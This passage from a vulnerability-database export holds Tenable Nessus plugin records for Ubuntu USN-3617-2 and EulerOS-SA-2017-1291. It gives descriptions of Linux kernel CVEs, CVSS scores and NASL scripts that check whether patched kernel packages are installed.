(CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in the loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-04T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe, linux-gcp, linux-oem vulnerabilities (USN-3617-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3617-2.NASL", "href": "https://www.tenable.com/plugins/nessus/108835", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108835);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe, linux-gcp, linux-oem vulnerabilities (USN-3617-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. 
A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. 
A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). 
(CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-1012-gcp\", pkgver:\"4.13.0-1012.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-1022-oem\", pkgver:\"4.13.0-1022.24\")) flag++;\nif (ubuntu_check(osver:\"16.04\", 
pkgname:\"linux-image-4.13.0-38-generic\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-38-generic-lpae\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.13.0-38-lowlatency\", pkgver:\"4.13.0-38.43~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.13.0.1012.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.13.0.1012.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.13.0.38.57\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.13.0.1022.26\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-gcp / linux-image-4.13-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:52:43", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A vulnerability was found in the key management\n subsystem of the Linux kernel. 
An update on an\n uninstantiated key could cause a kernel panic, leading\n to denial of service (DoS).(CVE-2017-15299)\n\n - The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel before\n 4.13.8 allows local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed\n setup.(CVE-2017-16525)\n\n - drivers/uwb/uwbd.c in the Linux kernel before 4.13.6\n allows local users to cause a denial of service\n (general protection fault and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16526)\n\n - drivers/usb/core/config.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The get_endpoints function in\n drivers/usb/misc/usbtest.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16532)\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel\n before 4.13.8 allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The uas driver in the Linux kernel before 4.13.6 allows\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device, related to\n drivers/usb/storage/uas-detect.h and\n drivers/usb/storage/uas.c.(CVE-2017-16530)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel before\n 4.13.10 allows local 
users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - A flaw was found that sound/core/timer.c in the Linux\n kernel before 4.11.5 is vulnerable to a data race in\n the ALSA /dev/snd/timer driver resulting in local users\n being able to read information belonging to other\n users. Uninitialized memory contents may be disclosed\n when a read and an ioctl happen at the same\n time.(CVE-2017-1000380)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and 
system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The cdc_parse_cdc_header function in\n drivers/usb/core/message.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16534)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel before 4.13.6 allows local users to\n cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16529)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-01T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1291)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16525", "CVE-2017-15299", "CVE-2017-1000380", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16531", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-16644", "CVE-2017-16530", "CVE-2017-16645"], "modified": "2017-12-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1291.NASL", "href": "https://www.tenable.com/plugins/nessus/104910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104910);\n script_version(\"3.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000380\",\n \"CVE-2017-15299\",\n \"CVE-2017-16525\",\n \"CVE-2017-16526\",\n \"CVE-2017-16529\",\n \"CVE-2017-16530\",\n \"CVE-2017-16531\",\n \"CVE-2017-16532\",\n \"CVE-2017-16533\",\n \"CVE-2017-16534\",\n \"CVE-2017-16535\",\n \"CVE-2017-16536\",\n \"CVE-2017-16537\",\n \"CVE-2017-16538\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n 
\"CVE-2017-16649\",\n \"CVE-2017-16650\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1291)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A vulnerability was found in the key management\n subsystem of the Linux kernel. An update on an\n uninstantiated key could cause a kernel panic, leading\n to denial of service (DoS).(CVE-2017-15299)\n\n - The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel before\n 4.13.8 allows local users to cause a denial of service\n (use-after-free and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to disconnection and failed\n setup.(CVE-2017-16525)\n\n - drivers/uwb/uwbd.c in the Linux kernel before 4.13.6\n allows local users to cause a denial of service\n (general protection fault and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16526)\n\n - drivers/usb/core/config.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The get_endpoints function in\n drivers/usb/misc/usbtest.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16532)\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux 
kernel\n before 4.13.8 allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The uas driver in the Linux kernel before 4.13.6 allows\n local users to cause a denial of service (out-of-bounds\n read and system crash) or possibly have unspecified\n other impact via a crafted USB device, related to\n drivers/usb/storage/uas-detect.h and\n drivers/usb/storage/uas.c.(CVE-2017-16530)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel before\n 4.13.10 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - A flaw was found that sound/core/timer.c in the Linux\n kernel before 4.11.5 is vulnerable to a data race in\n the ALSA /dev/snd/timer driver resulting in local users\n being able to read information belonging to other\n users. 
Uninitialized memory contents may be disclosed\n when a read and an ioctl happen at the same\n time.(CVE-2017-1000380)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB 
device.(CVE-2017-16644)\n\n - The cdc_parse_cdc_header function in\n drivers/usb/core/message.c in the Linux kernel before\n 4.13.6 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16534)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel before 4.13.6 allows local users to\n cause a denial of service (out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16529)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1291\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2e77fd1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", 
